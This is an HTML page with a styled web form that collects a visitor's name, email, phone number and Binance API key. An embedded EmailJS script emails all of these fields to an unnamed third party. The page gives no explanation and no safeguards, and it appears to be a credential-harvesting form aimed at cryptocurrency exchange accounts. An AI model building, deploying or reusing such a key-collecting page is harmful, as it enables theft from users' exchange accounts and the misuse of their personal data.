<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://kit.fontawesome.com/c43e7732d7.js" crossorigin="anonymous"></script>

    <style type="text/css">
        * {
            margin: 0;
            padding: 0;
            font-family:'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif ;
            box-sizing: border-box;
        }
        .hero {
            width: 100%;
            height: 100vh;
            background-color: rgb(145, 143, 143);
            background-position: center;
            background-size: cover;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        form {
            width: 90%;
            max-width: 600px;
        }

        .field {
            margin-bottom: 30px;
            position: relative;
        }
        input, textarea {
            width: 100%;
            padding: 10px;
            outline: 0;
            border: 1px solid #fff;
            color: #fff;
            background: transparent;
            font-size: 15px;
        }

        label {
            height: 100%;
            position: absolute;
            left: 0;
            top: 0;
            padding: 10px;
            color: #fff;
            cursor: text;
            transition: 0.2s;
        }

        button[type="submit"] {
            padding: 10px;
            color: #fff;
            outline: none;
            background: transparent;
            border: 1px solid #fff;
            width: 100%;
            cursor: pointer;
        }

        input:focus ~ label,
        input:valid ~ label,
        textarea:focus ~ label,
        textarea:valid ~ label {
            top: -35px;
            font-size: 14px;
        }
        .row {
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .row .field {
            flex-basis: 48%;
        }
    </style>
</head>
<body>
    <div class="hero">
        <form id="form">
            <div class="row">
                <div class="field">
                    <input type="text" name="name" id="name" required />
                    <label for="to_name"><i class="fa-solid fa-user"></i>Your Name</label>
                </div>
                <div class="field">
                    <input type="text" name="Email" id="Email" required />
                    <label for="Email"><i class="fa-solid fa-envelope"></i>Your Email Address</label>
                </div>
            </div>
            <div class="field">
                <input type="text" name="Phone" id="Phone" required />
                <label for="Phone"><i class="fa-solid fa-phone-volume"></i>Your Phone number</label>
            </div>
            <div class="field">
                <input type="text" name="API_KEY" id="API_KEY" required />
                <label for="API_KEY">Binance API KEY</label>
            </div>
            <div class="field">
                <input type="text" name="size" id="size" required />
                <label for="size">Size</label>
            </div>
            <div class="field">
                <textarea id="message" rows="8" required></textarea>
                <label for="message"><i class="fa-solid fa-comments"></i>message</label>
            </div>

        <button type="submit" id="button" value="Send Email"><i class="fa-solid fa-paper-plane"></i>Submit</button>
    
        </form>
    </div>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
    <script type="text/javascript">
        emailjs.init("sO0nmYykIo7LZPjyo");

        const btn = document.getElementById('button');
        console.log(btn);
        document.getElementById('form')
        .addEventListener('submit', function(event) {
            event.preventDefault();

            btn.value = 'Sending...';

            const serviceID = 'yangso';
            const templateID = 'yangso';

            emailjs.sendForm(serviceID, templateID, this)
            .then(() => {
                btn.value = 'Send Email';
                alert('Sent!');
            }, (err) => {
                btn.value = 'Send Email';
                alert(JSON.stringify(err));
            });
        });

</script>
</body>
</html>